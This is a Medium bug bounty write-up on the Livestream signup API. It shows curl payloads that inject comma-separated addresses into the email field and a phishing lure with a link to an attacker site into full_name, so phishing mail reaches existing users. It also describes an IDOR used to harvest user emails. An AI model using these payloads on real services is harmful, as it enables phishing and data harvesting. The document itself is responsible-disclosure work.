Vimeo Livestream Bug Bounty WriteUp

Mohamed Slamat
Jan 29 · 3 min read

Phishing Using Signup at Livestream API

Hi guys , Today I will share with you Writeup about this vulnerability

So to signup up in Livestream, we need to send email,full_name,password to the API endpoint https://api.livestream.com/accounts

Payload :

curl -i -X POST https://api.new.livestream.com/accounts -d ‘email=x123580@yopmail.com&password=12345678950&full_name=meisyou’

API Response :

{“id”:29106223,”full_name”:”meisyou”,”short_name”:null,”picture”:null,”is_beta_producer”:true,”timezone”:”Africa/Algiers”,”description”:null,”background_image”:null,”background_color”:null,”background_repeat”:null,”background_position”:null,”background_attachment”:null,”created_at”:”2020–01–24T10:04:59.580Z”,”is_locked”:false,”upcoming_events”:null,”past_events”:null,”links”:null,”google_analytics_id”:null,”mixpanel_id”:”577f53fc-61ea-46a7-b21c-aba016bb85bc”,”signup_page”:null,”signup_action”:null,”devices”:{“total”:0,”data”:[]},”category”:null,”category_name”:null,”private”:false,”features”:null,”plan_id”:-1,”plan_info”:{“id”:-1,”features”:”0",”type”:10,”is_scoped”:false},”features_with_plan”:null,”is_searchable”:true,”is_public”:true,”ad_account_id”:null,”ad_provider_id”:null,”ad_custom_params”:{“accountId”:”%accountId%”,”eventId”:”%eventId%”,”live”:”%isLive%”,”embedPath”:”%embedPath%”,”embedHost”:”%embedHost%”},”ad_enabled_for_vod”:false,”ad_enabled_for_live”:false,”ad_rules_enabled”:false,”ad_midroll_duration”:40,”ad_enabled_for_owner”:true,”ad_types”:[“preroll”],”ad_enabled”:false,”privacy_freeze”:false,”followers”:null,”following”:null}

And a mail contain URL activation will send to this mail : x123580@yopmail.com

As you see a message start with Hi Full_name …..

But if we send the same payload again with same user

API Response :

{“name”:”DuplicateEntryError”,”message”:”email already exists.”,”field”:”email”}

Since the user already exist, We can’t register him again and he will receive nothing , Nah ?

So after guessing the backend code …

I think is written by this way :

Pseudo code :

if email in db : 
response = "email already exists"
else :
register()
mail(email,msg)

I noticed that email is not an email format , I mean you can send what u want as email some blabla and the account will opened !

To login with this account , you just need to inspect element and change the type of input email to text !

So our blabla will store in database two !

Hmmmmmm !!!

Okey let’s meet mail() function in PHP

How it work ?

mail($email,$subject,$header,$messgae);

Let’s talk about $email variable :

The mail() function can send to one or more emails !!! , If the $email variable contain many emails splited by the COMMA “,”

So if the $email = “email1@dom.com,email2@dom.com”; a mail will send to the both of emails with same subject & message 😮

And since we control the full_name in our payload …

And we can pass if email in db because :

“blabla@bll.dz,x123580@yopmail.com” != “x123580@yopmail.com

Let’s Phish 😊 ✌️ :

curl -i -X POST https://api.new.livestream.com/accounts -d ‘email=blabla,x123580@yopmail.com&password=12345678950&full_name=We noticed that your account is Hacked by someone , Please confirm and reset your account here https://hackersite.letsphish.com

A mail was sent to an existent user (x123580@yopmail.com) using livestream api

PS : Im not sure that the api use mail() function or even they coded by php But it worked xD ✌️

Impact :

Since there is a small IDOR in the api

ie : https://api.new.livestream.com/accounts/0000007

Attacker can get users info from accounts/id and using some OSINT , he will get Livestream users emails

Attacker can send unlimited phishing mails to Livestream users !

Livestream Response :

i) This is not a security Bug ! => Report Closed !

ii ) Me: Ah really, are you sure ? Livestream: Wait … This is a Security bug => Report Opened => Report Triaged

iii) Livestream send a Bounty ( Not full )

IV ) Livestream closed report as #Duplicated with another report based on XSS (I can’t talk about it for program confidentiality ) which have no relation with Phishing and bypassing signup mail func xD …

I hope you enjoyed, Happy Hunting

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade